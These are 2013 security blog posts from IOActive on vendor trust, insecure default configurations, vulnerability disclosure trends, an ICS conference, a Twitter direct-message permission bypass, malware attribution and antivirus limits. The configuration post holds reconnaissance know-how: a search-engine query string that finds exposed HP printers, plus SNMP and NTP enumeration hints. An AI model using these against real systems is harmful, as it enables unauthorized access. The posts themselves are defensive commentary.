INSIGHTS | February 12, 2013

Do as I say, not as I do. RSA, Bit9 and others…

You thought you had everything nailed down. Perhaps you even bypassed the “best practice” (which would have driven you to compliance and your security to the gutter) and focused on protecting your assets by applying the right controls in a risk-focused manner.

You had your processes, technologies, and logs all figured out. However, you still got “owned”. Do you know why? You are still a little naive.

You placed your trust in big-name vendors. You listened to them, you were convinced by their pitch, and maybe you even placed their products through rigorous testing to make sure they actually delivered. However, you forgot one thing. The big-name vendors do not always have your best interest at heart.

Such companies will preach and guide you through to the righteous passage. However, when you look behind the curtain, the truth is revealed.

The latest Bit9 compromise is not too surprising. Bit9 customers are obviously very security aware, as they opted to use a whitelisting product to their computing assets. As such, these customers are most likely high-value targets to adversaries. With acute security awareness, these customers probably have more security measures and practices to mitigate and protect themselves from attackers. In other words, if I were to scope out such a target for an attack, I would have to focus on supply chain elements that were weaker than the target itself (much in the same manner we teach our Red-Team Testing classes).

RSA was such a target. there were others. Bit9 was also target for some of its customers.

Color me surprised.

If you are a vendor that gloats over the latest compromise, please do not bother. If you have not gone through a similar threat model, your products are either not good enough (hence your customers are not high-value targets), or your own security is not up to speed and you have not realized yet that you have been breached.

If you are a security consumer and therefore care a bit more, do not make any assumptions about your security vendors. They are not the target. You are. As such, they have more generalized security practices than you do. Account for this in your security strategy, and never fully trust anything outside of your control span. It is your responsibility to hold such vendors to at least their own standard and demand oversight and proof that they do so.

 

INSIGHTS | February 6, 2013

The Anatomy of Unsecure Configuration: Reality Bites

As a penetration tester, I encounter interesting problems with network devices and software. The most common problems that I notice in my work are configuration issues. In today’s security environment, we can accept that a zero-day exploit results in system compromise because details of the vulnerability were unknown earlier. But, what about security issues and problems that have been around for a long time and can’t seem to be eradicated completely? I believe the existence of these types of issues shows that too many administrators and developers are not paying serious attention to the general principles of computer security. I am not saying everyone is at fault, but many people continue to make common security mistakes. There are many reasons for this, but the major ones are:

  • Time constraints: This is hard to imagine, because an administrator’s primary job is to manage and secure the network. For example: How long does it take to configure and secure a network printer? If you ask me, it should not take much time to evaluate and configure secure device properties unless the network has significant complex requirements. But, even if there are complex requirements, it is worth investing the time to make it harder for bad guys to infiltrate the network.
  • Ignorance, fear, and a ‘don’t care’ attitude: This is a human problem. I have seen many network devices that are not touched or reconfigured for years and administrators often forget about them. When I have discussed this with administrators they argued that secure reconfiguration might impact the reliability and performance of the device. As a result, they prefer to maintain the current functionality but at the risk of an insecure configuration.
  • Problems understanding the issue: If complex issues are hard to understand, then easy problems should be easy to manage, right? But it isn’t like that in the real world of computer security. For example, every software or network device is accompanied by manuals or help files. How many of us spend even a few minutes reading the security sections of these documents? The people who are cautious about security read these sections, but the rest just want to enjoy the device or software’s functionality. Is it so difficult to read the security documentation that is provided? I disagree.  For a reasonable security assessment of any new product and software, reading the manuals is one key to impressive results. We cannot simply say we don’t understand the issue­­­ and if we ignore the most basic security guidance, then attackers have no hurdles in exploiting the most basic known security issues.

 

Default Configuration – Basic Authentication

 

Here are a number of examples to support this discussion:

The majority of network devices can be accessed using Simple Network Management Protocol (SNMP) and community strings that typically act as passwords to extract sensitive information from target systems. In fact, weak community strings are used in too many devices across the Internet. Tools such as snmpwalk and snmpenum make the process of SNMP enumeration easy for attackers. How difficult is it for administrators to change default SNMP community strings and configure more complex ones? Seriously, it isn’t that hard.

A number of devices such as routers use the Network Time Protocol (NTP) over packet-switched data networks to synchronize time services between systems. The basic problem with the default configuration of NTP services is that NTP is enabled on all active interfaces. If any interface exposed on the Internet uses UDP port 123 the remote user can easily execute internal NTP readvar queries using ntpq to gain potential information about the target server including the NTP software version, operating system, peers, and so on.

Unauthorized access to multiple components and software configuration files is another big problem. This is not only a device and software configuration problem, but also a byproduct of design chaos i.e. the way different network devices are designed and managed in the default state. Too many devices on the Internet allow guests to obtain potentially sensitive information using anonymous access or direct access. In addition, one has to wonder about how well administrators understand and care about security if they simply allow configuration files to be downloaded from target servers. For example, I recently conducted a small test to verify the presence of the file Filezilla.xml, which sets the properties of FileZilla FTP servers, and found that a number of target servers allow this configuration file to be downloaded without any authorization and authentication controls. This would allow attackers to gain direct access to these FileZilla FTP servers because the passwords are embedded in these configuration files.

 

 

 

FileZilla Configuration File with Password

It is really hard to imagine that anyone would deploy sensitive files containing usernames and passwords on remote servers that are exposed on the network. What results do you expect when you find these types of configuration issues?

 

XLS File Containing Credentials for Third-party Resources
The presence of multiple administration interfaces widens the attack surface because every single interface makes available different attack vectors. A number of network-based devices have SSH, Telnet, FTP, and Web administration interfaces. The default installation of a network device activates at least two or three different interfaces for remote management. This allows attackers to attack network devices by exploiting inherent weaknesses in the protocols used. In addition to that, the presence of default credentials can further ease the process of exploitation. For example, it is easy to find a large number of unmanaged network devices on the Internet without proper authentication and authorization.

 

 

 

Cisco Catalyst – Insecure Interface
How can we forget about backend databases? The presence of default and weak passwords for the MS SQL system administrator account is still a valid configuration that can be found in the internal networks of many organizations. For example, network proxies that require backend databases are configured with default and weak passwords. In many cases administrators think internal network devices are more secure than external devices. But, what happens if the attacker finds a way to penetrate the internal network
Thesimple answer is: game over. Integrated web applications with backend databases using default configurations are an “easy walk in the park” for attackers. For example, the following insecure XAMPP installation would be devastative.

 

 

 

XAMPP Security – Web Page
The security community recently encountered an interesting configuration issue in the GitHub repository (http://www.securityweek.com/github-search-makes-easy-discovery-encryption-keys-passwords-source-code), which resulted in the disclosure of SSH keys on the Internet. The point is that when you own an account or repository on public servers, then all administrator responsibilities fall on your shoulders. You cannot blame the service provider, Git in this case. If users upload their private SSH keys to the repository, then whom can you blame? This is a big problem and developers continue to expose sensitive information on their public repositories, even though Git documents show how to secure and manage sensitive data.
Another interesting finding shows that with Google Dorks (targeted search queries), the Google search engine exposed thousands of HP printers on the Internet (http://port3000.co.uk/google-has-indexed-thousands-of-publicly-acce). The search string “inurl:hp/device/this.LCDispatcher?nav=hp.Print” is all you need to gain access to these HP printers. As I asked at the beginning of this post, “How long does it take to secure a printer?” Although this issue is not new, the amazing part is that it still persists.
The existence of vulnerabilities and patches is a completely different issue than the security issues that result from default configurations and poor administration. Either we know the security posture of the devices and software on our networks but are being careless in deploying them securely, or we do not understand security at all. Insecure and default configurations make the hacking process easier. Many people realize this after they have been hacked and by then the damage has already been done to both reputations and businesses.
This post is just a glimpse into security consciousness, or the lack of it. We have to be more security conscious today because attempts to hack into our networks are almost inevitable. I think we need to be a bit more paranoid and much more vigilant about security.

 

 

 

INSIGHTS | February 4, 2013

2012 Vulnerability Disclosure Retrospective

Vulnerabilities, the bugbear of system administrators and security analysts alike, keep on piling up – ruining Friday nights and weekends around the world as those tasked with fixing them work against ever shortening patch deadlines.

In recent years the burden of patching vulnerable software may have felt to be lessening; and it was, if you were to go by the annual number of vulnerabilities publicly disclosed. However, if you thought 2012 was a little more intense than the previous half-decade, you’ll probably not be surprised to learn that last year bucked the downward trend and saw a rather big jump – 26% over 2011 – all according to the latest analyst brief from NSS Labs, “Vulnerability Threat Trends: A Decade in Review, Transition on the Way”.

Rather than summarize the fascinating brief from NSS Labs with a list of recycled bullet points, I’d encourage you to read it yourself and to view the fascinating video they constructed that depicts the rate and diversity of vulnerability disclosures throughout 2012 (see the video – “The Evolution of 2012 Vulnerability Disclosures by Vendor”).

I was particularly interested in the Industrial Control System (ICS/SCADA) vulnerability growth – a six-fold increase since 2010! Granted, of the 5225 vulnerabilities publicly disclosed and tracked in 2012 only 124 were ICS/SCADA related (2.4 percent), it’s still noteworthy – especially since I doubt very few of vulnerabilities in this field are ever disclosed publicly.

Once you’ve read the NSS Labs brief and digested the statistics, let me tell you why the numbers don’t really matter and why the ranking of vulnerable vendors is a bit like ranking car manufacturers by the number of red cars they sold last year.

A decade ago, as security software and appliance vendors battled for customer dollars, vulnerability numbers mattered. It was a yardstick of how well one security product (and vendor) was performing against another – a kind of “my IDS detects 87% of high risk vulnerabilities” discussion. When the number of vulnerability disclosures kept on increasing and the cost of researching and developing detection signatures kept going up, yet the price customers were willing to pay in maintenance fees for their precious protection technologies was going down, much of the discussion then moved to ranking and scoring vulnerabilities… and the Common Vulnerability Scoring System (CVSS) was devised.

CVSS changed the nature of the game. It became less about covering a specific percentage of vulnerabilities and more about covering the most critical and exploitable. The ‘High, Medium, and Low’ of old, got augmented with a formal scoring system and a bevy of new labels such as ‘Critical’ and ‘Highly Critical’ (which, incidentally, makes my teeth hurt as I grind them at the absurdity of that term). Rather than simply shuffling everything to the right, with the decade old ‘Medium’ becoming the new ‘Low’, and the old ‘Low’ becoming a shrug and a sensible “if you can be bothered!”… we ended up with ‘High’ being “important, fix immediately”, then ‘Critical’ assuming the role of “seriously, you need to fix this one first!”, and ‘Highly Critical’ basically meaning “Doh! The Mayans were right, the world really is going to end!”

But I digress. The crux of the matter as to why annual vulnerability statistics don’t matter and will continue to matter less in a practical sense as times goes by is because they only reflect ‘Disclosures’. In essence, for a vulnerability to be counted (and attribution applied) it must be publicly disclosed, and more people are finding it advantageous to not do that.

Vulnerability markets and bug purchase programs – white, gray and black – have changed the incentive to disclose publicly, as well as limit the level of information that is made available at the time of disclosure. Furthermore, the growing professionalization of bug hunting has meant that vulnerability discoveries are valuable commercial commodities – opening doors to new consulting engagements and potential employment with the vulnerable vendor. Plus there’s a bunch of other lesser reasons why public disclosures (as a percentage of actual vulnerabilities found by bug hunters and reported to vendors) will go down.

The biggest reason why the vulnerability disclosures numbers matter less and less to an organization (and those charged with protecting it), is because the software landscape has fundamentally changed. The CVSS approach was primarily designed for software that was brought, installed and operated by multiple organizations – i.e. software packages that could be patched by their many owners.

With today’s ubiquitous cloud-based services – you don’t own the software and you don’t have any capability (or right) to patch the software. Whether it’s Twitter, Salesforce.com, Dropbox, Google Docs, or LinkedIn, etc. your data and intellectual property is in the custodial care of a third-party who doesn’t need to publicly disclose the nature (full or otherwise) of vulnerabilities lying within their backend systems – in fact most would argue that it’s in their best interest to not make any kind of disclosure (ever!).

Why would someone assign a CVE number to the vulnerability? Who’s going to have all the disclosure details to construct a CVSS score, and what would it matter if they did? Why would the service provider issue an advisory? As a bug hunter who responsibly discloses the vulnerability to the cloud service provider you’d be lucky to even get any public recognition for your valuable help.

With all that said and done, what should we take-away from the marvelous briefing that NSS Labs has pulled together? In essence, there’s a lot of vulnerabilities being disclosed and the vendors of the software we deploy on our laptops and servers still have a ways to go to improving their security development lifecycle (SDL) – some more than others.

While it would be nice to take some solace in the ranking of vulnerable vendors, I’d be more worried about the cloud vendors and their online services and the fact that they’re not showing up in these annual statistics – after all, that’s were more and more of our critical data is being stored and manipulated.

— Gunter Ollmann, CTO — IOActive, Inc.

INSIGHTS | January 25, 2013

S4x13 Conference

S4 is my favorite conference. This is mainly because it concentrates on industrial control systems security, which I am passionate about. I also enjoy the fact that the presentations cover mostly advanced topics and spend very little time covering novice topics.

Over the past four years, S4 has become more of a bits and bytes conference with presentations that explain, for example, how to upload Trojan firmwares to industrial controllers and exposés that cover vulnerabilities (in the “insecure by design” and “ICS-CERT” sense of the word).

This year’s conference was packed with top talent from the ICS and SCADA worlds and offered a huge amount of technical information. I tended to follow the “red team” track, as these talks broke varying levels of control systems networks.

Sergey Gordeychick gave a great talk on the vulnerabilities in various ICS software applications, including the release of an “1825-day exploit” for WinCC, which Siemens did not patch for five years. (The vulnerability finally closed in December 2012.)
 

Alexander Timorin and Dmitry Skylarov released a new tool for reversing S7 passwords from a packet capture. A common feature of many industrial controllers includes homebrew hashing algorithms and authentication mechanisms that simply fall apart under a few days of scrutiny. Their tool is being incorporated into John the Ripper. A trend in the ICS space seems to include the incorporation of ICS-specific attacks into current attack frameworks. This makes ICS hacking far more available to network security assessors, as well as to the “Bad Guys”. My guess is that this trend will continue in 2013.
Billy Rios and Terry McCorkle talked about medical controllers and showed a Phillips XPER controller that they had purchased on eBay. The computer itself had not been wiped and contained hard-coded accounts as well as trivial buffer overflow vulnerabilities running on Windows XP.
Arthur Gervais released a slew of Schneider Modicon PLC-related vulnerabilities. Schneider’s service for updating Unity (the engineering software for Modicon PLCs) and other utilities used HTTP to download software updates, for example. I was sad that I missed his talk due to a conflict in the speaking schedule.
Luigi Auriemma and his colleague Donato Ferrante demonstrated their own binary patching system, which allows them to patch applications while they are executing. The technology shows a lot of promise. They are currently marketing it as a way to provide patches for unsupported software. I think that the true potential of their system is to patch industrial systems without shutting down the process. It may take a while for any vendor to adopt this technique, but it could be a powerful motivator to get end users to apply patches. Scheduling an outage window is the most-cited reason for not patching industrial systems, and ReVuln is showing that we can work around this limitation.

 

My favorite talk was one that was only semi-technical in nature and more defensive than offensive. It was about implementing an SDL and a fuzz-testing strategy at OSISoft. OSISoft’s PI server is the most frequently used data historian for industrial processes. Since C-level employees want to keep track of how their process is doing, historical data often must be exported from the control systems network to the corporate network in some fashion. In the best case scenario, this is usually done by way of a PI Server in the DMZ. In the worst case scenario, a corporate system will reach into the control network to communicate with the PI server. Either way, the result is the same: PI is a likely target if an attacker wants to jump from the corporate network to the control network. It is terrific and all too rare still to see a software company in ICS sharing their security experiences.

 

Digital Bond provides a nice “by the numbers” look at the conference.
If you are technical and international minded and want to talk to actual ICS operators, S4 is a great place to start.
INSIGHTS | January 22, 2013

You cannot trust social media to keep your private data safe: Story of a Twitter vulnerability

I‘m always worried about the private information I have online. Maybe this is because I have been hacking for a long time, and I know everything can be hacked. This makes me a bit paranoid. I have never trusted web sites to keep my private information safe, and nowadays it is impossible to not have private information published on the web, such as a social media web site. Sooner or later you could get hacked, this is a fact.

 

Currently, many web and mobile applications give users the option to sign in using their Twitter or Facebook account. Keeping in mind the fact that Twitter currently has 200 million active monthly users (http://en.wikipedia.org/wiki/Twitter), it makes a lot of sense for third-party applications to offer users an easy way to log in. Also, since applications can obtain a wealth of information from your Twitter or Facebook account, most of the time you do not even need to register. This is convenient, and it saves time signing into third-party applications using Twitter or Facebook.

 

 

Every time I’m asked to sign in using Twitter or Facebook, my first thought is, “No way!”  I don’t want to give access to my Twitter and Facebook accounts regardless of whether I have important information there or not. I always have an uneasy feeling about giving a third-party application access to my accounts due to the security implications.

 

Last week I had a very interesting experience.

I was testing a web application that is under development. This application had an option to allow me to sign into Twitter. If I selected this option, the application would have access to my Twitter public feed (such as reading Tweets from my timeline and seeing who I follow). In addition, the application would have been able to access Twitter functionality on my behalf (such as following new people, updating my profile, posting Tweets for me). However, it wouldn’t have access to my private Twitter information (such as direct messages and more importantly my password). I knew this to be true because of the following information that is displayed on Twitter’s web page for “Signing in with Twitter”:

 

Image 1

 

After viewing the displayed web page, I trusted that Twitter would not give the application access to my password and direct messages. I felt that my account was safe, so I signed in and played with the application. I saw that the application had the functionality to access and display Twitter direct messages. The functionality, however, did not work, since Twitter did not allow the application to access these messages. In order to gain access, the application would have to request proper authorization through the following Twitter web page:

 

  Image2

 

The web page displayed above is similar to the previous web page (Image 1). However, it also says the application will be able to access your direct messages. Also, the blue button is different. It says “Authorize app” instead of “Sign in”. While playing with the application, I never saw this web page (image 2). I continued playing with the application for some time, viewing the functionality, logging in and out from the application and Twitter, and so on. After logging in to the application, I suddenly saw something strange. The application was displaying all of my Twitter direct messages. This was a huge and scary surprise. I wondered how this was possible. How had the application bypassed Twitter’s security restrictions? I needed to know the answer.

 

My surprise didn’t end here. I went to https://twitter.com/settings/applications to check the application settings. The page said “Permissions: read, write, and direct messages”. I couldn’t understand how this was possible, since I had never authorized the application to access my “private” direct messages. I realized that this was a huge security hole.

 

I started to investigate how this could have happened. After some testing, I found that the application obtained access to my private direct messages when I signed in with Twitter for a second or third time. The first time I signed in with Twitter on the application, it only received read and write access permissions. This gave the application access to what Twitter displays on its “Sign in with Twitter” web page (see image 1). Later, however, when I signed in again with Twitter without being already logged in to Twitter (not having an active Twitter session – you have to enter your Twitter username and password), the application obtained access to my private direct messages. It did so without having authorization, and Twitter did not display any messages about this. It was a simple bypass trick for third-party applications to obtain access to a user’s Twitter direct messages.

 

In order for a third-party application to obtain access to Twitter direct messages, it first has to be registered and have its direct message access level configured here: https://dev.twitter.com/apps. This was the case for the application I was testing.  In addition and more importantly, the application has to obtain authorization on the Twitter web page (see Image 2) to access direct messages. In my case, it never got this. I never authorized the application, and I did not encounter a web page requesting my authorization to give the application access to my private direct messages.

 

I tried to quickly determine the root cause, although I had little time. However, I could not determine this. I therefore decided to report the vulnerability to Twitter and let them do a deeper investigation. The Twitter security team quickly answered and took care of the issue, fixing it within 24 hours. This was impressive. Their team was very fast and responsive. They said the issue occurred due to complex code and incorrect assumptions and validations.

 

While I think the Twitter security team is great, I do not think the same of the Twitter vulnerability disclosure policy. The vulnerability was fixed on January 17, 2013, but Twitter has not issued any alerts/advisories notifying users.

 

There should be millions of Twitter users (remember Twitter has 200 million active users) that have signed in with Twitter into third-party applications. Some of these applications might have gained access to and might still have access to Twitter users private direct messages (after the security fix the application I tested still had access to direct messages until I revoked it).

 

Since Twitter, has not alerted its users of this issue, I think we all need to spread the word. Please share the following with everyone you know:

Check third-party applications permissions here: https://twitter.com/settings/applications

If you see an application that has access to your direct messages and you never authorized it, then revoke it immediately.

 

Ironically, we could also use Twitter to help users. We could tweet the following:

Twitter shares your DMs without authorization, check 3rd party application permissions  https://ioactive.com/you-can-not-trust-social-media-twitter-vulnerable/ #ProtectYourPrivacy (Please RT)

 

I love Twitter. I use it daily. However, I think Twitter still needs a bit of improvement, especially when it comes to alerting its users about security issues when privacy is affected.

 

INSIGHTS | January 21, 2013

When a Choice is a Fingerprint

We frequently hear the phrase “Attribution is hard.” And yes, if the adversary exercises perfect tradecraft, attribution can be hard to the point of impossible. But we rarely mention the opposite side of that coin, how hard it is to maintain that level of tradecraft over the lifetime of an extended operation. How many times out of muscle memory have you absent-mindedly entered one of your passwords in the wrong application? The consequences of this are typically nonexistent if you’re entering your personal email address into your work client, but they can matter much more if you’re entering your personal password while trying to log into the pwned mail server of Country X’s Ministry of Foreign Affairs. People make mistakes, and the longer the timeframe, the more opportunities they have to do so.

This leads me to the recent release from Kaspersky labs, about a malware campaign referred to as “Red October”, which they have attributed to Russian hackers. There are a number of indications pointing to Russian origination, including Russian words in the source code,  a trojan dropper that enables Cyrillic before installation, and targets concentrated in Russia’s sphere of influence. Although Kaspersky has avoided naming the sponsor of the campaign as the Russian government, the targets of the malware are strongly suggestive of government sponsorship. The campaign seemed to selectively target governments, diplomatic facilities, defense, research institutes, etc. These are targets consistent with sponsors seeking geo-political intelligence, not criminals seeking profit. Kaspersky hypothesizes the perpetrators may have collected the data to sell it, but I would argue that this is fallacious. The customer of this information would be a government, and if a government is paying criminals for the information, I would argue that’s state-sponsorship.
With that context, the one datapoint that was most interesting to me in Kaspersky’s release was the inclusion of the word, “zakladka”. As Kasperky mentions in their report, “Zakladka” is a Russian word that can mean “bookmark.” In slang it can also mean “Undocumented feature” or a brick with an embedded microphone, like the kind you would sneak into an adversary nation’s embassy.
It’s delightfully poetic then, that in a piece of malware apparently intended to target embassies someone (presumably Russian) would choose to name a module “zakladka.” The United States and Russia have a rich history of attempting to bug each other’s diplomatic facilities. As early as 1945 the Soviet Union infiltrated an ingenuous listening device into the office of the US ambassador to Moscow, hiding it in a wooden US Seal presented as a gift [1]. By 1964 the Soviets were able to collect extensive classified information from the US embassy through hidden microphones [2]. In 1985 construction work stopped on a new US Embassy building in Moscow after it was determined that the building was so riddled with microphones, which had been integrated into the construction, that it could never be considered secure [3].
Presumably in homage to this history, a programmer decided to name his module of code “zakladka”, which would be included in malware that is effectively the evolution of a microphone hidden in drywall. Zakladka is an appropriate name, but the very elegance with which its name matches
its function undermines the deniability of the malware. In this case, it was a choice made by a programmer years ago, and it has repercussions as forensic experts attempt to unravel the source of the malware today.
It’s a reminder of how humans make mistakes. Defenders often talk about the difficulty of attribution, but as the offense we seldom talk about the challenge in gaining and maintaining network access on a target system while remaining totally unnoticed. We take it for granted.
Seemingly innocuous decisions made days, weeks, or months ago can unravel what was otherwise sound tradecraft. In this case, I just found it fascinating that the choice of name for a module–an elegantly appropriate choice–can be as strong a fingerprint for attribution as anything else.
INSIGHTS | January 17, 2013

Offensive Defense

I presented before the holiday break at Seattle B-Sides on a topic I called “Offensive Defense.” This blog will summarize the talk. I feel it’s relevant to share due to the recent discussions on desktop antivirus software   (AV)

What is Offensive Defense?

The basic premise of the talk is that a good defense is a “smart” layered defense. My “Offensive Defense” presentation title  might be interpreted as fighting back against your adversaries much like the Sexy Defense talk my co-worker Ian Amit has been presenting.

My view of the “Offensive Defense” is about being educated on existing technology and creating a well thought-out plan and security framework for your network. The “Offensive” word in the presentation title relates to being as educated as any attacker who is going to study common security technology and know it’s weaknesses and boundaries. You should be as educated as that attacker to properly build a defensive and reactionary security posture. The second part of an “Offensive Defense” is security architecture. It is my opinion that too many organizations buy a product to either meet the minimal regulatory requirements, to apply “band-aide” protection (thinking in a point manner instead of a systematic manner), or because the organization thinks it makes sense even though they have not actually made a plan for it. However, many larger enterprise companies have not stepped back and designed a threat model for their network or defined the critical assets they want to protect.

At the end of the day, a persistent attacker will stop at nothing to obtain access to your network and to steal critical information from your network. Your overall goal in protecting your network should be to protect your critical assets. If you are targeted, you want to be able to slow down your attacker and the attack tools they are using, forcing them to customize their attack. In doing so, your goal would be to give away their position, resources, capabilities, and details. Ultimately, you want to be alerted before any real damage has occurred and have the ability to halt their ability to ex-filtrate any critical data.

Conduct a Threat Assessment, Create a Threat Model, Have a Plan!

This process involves either having a security architect in-house or hiring a security consulting firm to help you design a threat model tailored to your network and assess the solutions you have put in place. Security solutions are not one-size fits all. Do not rely on marketing material or sales, as these typically oversell the capabilities of their own product. I think in many ways overselling a product is how as an industry we have begun to have rely too heavily on security technologies, assuming they address all threats.

There are many quarterly reports and resources that technical practitioners turn to for advice such as Gartner reports, the magic quadrant, or testing houses including AV-Comparatives, ICSA Labs, NSS Labs, EICAR or AV-Test. AV-Test , in fact, reported this year that Microsoft Security Essentials failed to recognize enough zero-day threats with detection rates of only 69% , where the average is 89%. These are great resources to turn to once you know what technology you need, but you won’t know that unless you have first designed a plan.

Once you have implemented a plan, the next step is to actually run exercises and, if possible, simulations to assess the real-time ability of your network and the technology you have chosen to integrate. I rarely see this done, and, in my opinion, large enterprises with critical assets have no excuse not to conduct these assessments.

Perform a Self-assessment of the Technology

AV-Comparatives has published a good quote on their product page that states my point:

“If you plan to buy an Anti-Virus, please visit the vendor’s site and evaluate their software by downloading a trial version, as there are also many other features and important things for an Anti-Virus that you should evaluate by yourself. Even if quite important, the data provided in the test reports on this site are just some aspects that you should consider when buying Anti-Virus software.”

This statement proves my point in stating that companies should familiarize themselves with a security technology to make sure it is right for their own network and security posture.

There are many security technologies that exist today that are designed to detect threats against or within your network. These include (but are not limited to):

  • Firewalls
  • Intrusion Prevention Systems (IPS)
  • Intrusion Detectoin Systems (IDS)
  • Host-based Intrusion Prevention Systems (HIPS)
  • Desktop Antivirus
  • Gateway Filtering
  • Web Application Firewalls
  • Cloud-Based Antivirus and Cloud-based Security Solutions

Such security technologies exist to protect against threats that include (but are not limited to):

  • File-based malware (such as malicious windows executables, Java files, image files, mobile applications, and so on)
  • Network-based exploits
  • Content based exploits (such as web pages)
  • Malicious email messages (such as email messages containing malicious links or phishing attacks)
  • Network addresses and domains with a bad reputation

These security technologies deploy various techniques that include (but are not limited to):

  • Hash-detection
  • Signature-detection
  • Heuristic-detection
  • Semantic-detection
There are of course others  techniques (that I won’t go into great detail in this blog on) for example:
  • Reputation-based
  • Behavioral based
It is important to realize that there is no silver bullet defense out there, and given enough expertise, motivation, and persistence, each technique can be defeated. It is essential to understand the limitations and benefits of a particular product so that you can create a realistic, layered framework that has been architected to fit your network structure and threat model. The following are a few example attack techniques against each protection technique and technology (these have been widely publicized):

 

 

For the techniques that I have not listed in this table such as reputation, refer to my CanSecWest 2008 presentation “Wreck-utation“, which explains how reputation detection can be circumvented. One major example of this is a rising trend in hosting malicious code on a compromised legitimate website or running a C&C on a legitimate compromised business server. Behavioral sandboxes can also be defeated with methods such as time-lock puzzles and anti-VM detection or environment-aware code. In many cases, behavioral-based solutions allow the binary or exploit to pass through and in parallel run the sample in a sandbox. This allows what is referred to as a 1-victim-approach in which the user receiving the sample is infected because the malware was allowed to pass through. However, if it is determined in the sandbox to be malicious, all other users are protected. My point here is that all methods can be defeated given enough expertise, time, and resources.

Big Data, Machine Learning, and Natural Language Processing

My presentation also mentioned something we hear a lot about today… BIG DATA. Big Data plus Machine Learning coupled with Natural Language Processing allows a clustering or classification algorithm to make predictive decisions based on statistical and mathematical models. This technology is not a replacement for what exists. Instead, it incorporates what already exists (such as hashes, signatures, heuristics, semantic detection) and adds more correlation in a scientific and statistic manner. The growing number of threats combined with a limited number of malware analysts makes this next step virtually inevitable.

While machine learning, natural language processing, and other artificial intelligence sciences will hopefully help in supplementing the detection capabilities, keep in mind this technology is nothing new. However, the context in which it is being used is new. It has already been used in multiple existing technologies such as anti-spam engines and Google translation technology. It is only recently that it has been applied to Data Leakage Prevention (DLP), web filtering, and malware/exploit content analysis. Have no doubt, however, that like most technologies, it can still be broken.

Hopefully most of you have read Imperva’s report, which found that less than 5% of antivirus solutions are able to initially detect previously non-cataloged viruses. Regardless of your opinion on Imperva’s testing methodologies, you might have also read the less-scrutinized Cisco 2011 Global Threat report that claimed 33% of web malware encountered was zero-day malware not detectable by traditional signature-based methodologies at the time of encounter. This, in my experience, has been a more widely accepted industry statistic.

What these numbers are telling us is that the technology, if looked at individually, is failing us, but what I am saying is that it is all about context. Penetrating defenses and gaining access to a non-critical machine is never desirable. However, a “smart” defense, if architected correctly, would incorporate a number of technologies, situated on your network, to protect the critical assets you care about most.

 

 

 

The Cloud versus the End-Point

If you were to attend any major conference in the last few years, most vendors would claim “the cloud” is where protection technology is headed. Even though there is evidence to show that this might be somewhat true, the majority of protection techniques (such as hash-detection, signature-detection, reputation, and similar technologies) simply were moved from the desktop to the gateway or “cloud”. The technology and techniques, however, are the same. Of course, there are benefits to the gateway or cloud, such as consolidated updates and possibly a more responsive feedback and correlation loop from other cloud nodes or the company lab headquarters. I am of the opinion that there is nothing wrong with having anti-virus software on the desktop. In fact, in my graduate studies at UCSD in Computer Science, I remember a number of discussions on the end-to-end arguments of system design, which argued that it is best to place functionality at end points and at the highest level unless doing otherwise improves performance.

The desktop/server is the end point where the most amount of information can be disseminated. The desktop/server is where context can be added to malware, allowing you to ask questions such as:

 

  • Was it downloaded by the user and from which site?
  • Is that site historically common for that particular user to visit?
  • What happened after it was downloaded?
  • Did the user choose to execute the downloaded binary?
  • What actions did the downloaded binary take?

Hashes, signatures, heuristics, semantic-detection, and reputation can all be applied at this level. However, at a gateway or in the cloud, generally only static analysis is performed due to latency and performance requirements.

This is not to say that gateway or cloud security solutions cannot observe malicious patterns at the gateway, but restraints on state and the fact that this is a network bottleneck generally makes any analysis node after the end point thorough. I would argue that both desktop and cloud or gateway security solutions have their benefits though, and if used in conjunction, they add even more visibility into the network. As a result, they supplement what a desktop antivirus program cannot accomplish and add collective analysis.

 

Conclusion

My main point is that to have a secure network you have to think offensively by architecting security to fit your organization needs. Antivirus software on the desktop is not the problem. The problem is the lack of planing that goes into deployment as well as the lack of understanding in the capabilities of desktop, gateway, network, and cloud security solutions. What must change is the haste with which network teams deploy security technologies without having a plan, a threat model, or a holistic organizational security framework in place that takes into account how all security products work together to protect critical assets.

With regard to the cloud, make no mistake that most of the same security technology has simply moved from the desktop to the cloud. Because it is at the network level, the latency of being able to analyze the file/network stream is weaker and fewer checks are performed for the sake of user performance. People want to feel safe relying on the cloud’s security and feel assured knowing that a third-party is handling all security threats, and this might be the case. However, companies need to make sure a plan is in place and that they fully understand the capabilities of the security products they have chosen, whether they be desktop, network, gateway, or cloud based.

If you found this topic interesting, Chris Valasek and I are working on a related project that Chris will be presenting at An Evening with IOActive on Thursday, January 17, 2013. We also plan to talk about this at the IOAsis at the RSA Conference. Look for details!

INSIGHTS | January 7, 2013

The Demise of Desktop Antivirus

Are you old enough to remember the demise of the ubiquitous CompuServe and AOL CD’s that used to be attached to every computer magazine you ever brought between the mid-80’s and mid-90’s? If you missed that annoying period of Internet history, maybe you’ll be able to watch the death of desktop antivirus instead.

65,000 AOL CD’s as art

Just as dial-up subscription portals and proprietary “web browsers” represent a yester-year view of the Internet, desktop antivirus is similarly being confined to the annuls of Internet history. It may still be flapping vigorously like a freshly landed fish, but we all know how those last gasps end.

To be perfectly honest, it’s amazing that desktop antivirus has lasted this long. To be fair though, the product you may have installed on your computer (desktop or laptop) bears little resemblance to the antivirus products of just 3 years ago. Most vendors have even done away from using the “antivirus” term – instead they’ve tried renaming them as “protection suites” and “prevention technology” and throwing in a bunch of additional threat detection engines for good measure.

I have a vision of a hunchbacked Igor working behind the scenes stitching on some new appendage or bolting on an iron plate for reinforcement to the Frankenstein corpse of each antivirus product as he tries to keep it alive for just a little bit longer…

That’s not to say that a lot of effort doesn’t go in to maintaining an antivirus product. However, with the millions upon millions of new threats each month it’s hardly surprising that the technology (and approach) falls further and further behind. Despite that, the researchers and engineers that maintain these products try their best to keep the technology as relevant as possible… and certainly don’t like it when anyone points out the gap between the threat and the capability of desktop antivirus to deal with it.

For example, the New York Times ran a piece on the last day of 2012 titled “Outmaneuvered at Their Own Game, Antivirus Makers Struggle to Adapt” that managed to get many of the antivirus vendors riled up – interestingly enough not because of the claims of the antivirus industry falling behind, but because some of the statistics came from unfair and unscientific tests. In particular there was great annoyance that a security vendor (representing an alternative technology) used VirusTotal coverage as their basis for whether or not new malware could be detected – claiming that initial detection was only 5%.

I’ve discussed the topic of declining desktop antivirus detection rates (and evasion) many, many times in the past. From my own experience, within corporate/enterprise networks, desktop antivirus detection typically hovers at 1-2% for the threats that make it through the various network defenses. For newly minted malware that is designed to target corporate victims, the rate is pretty much 0% and can remain that way for hundreds of days after the malware has been released in to the wild.

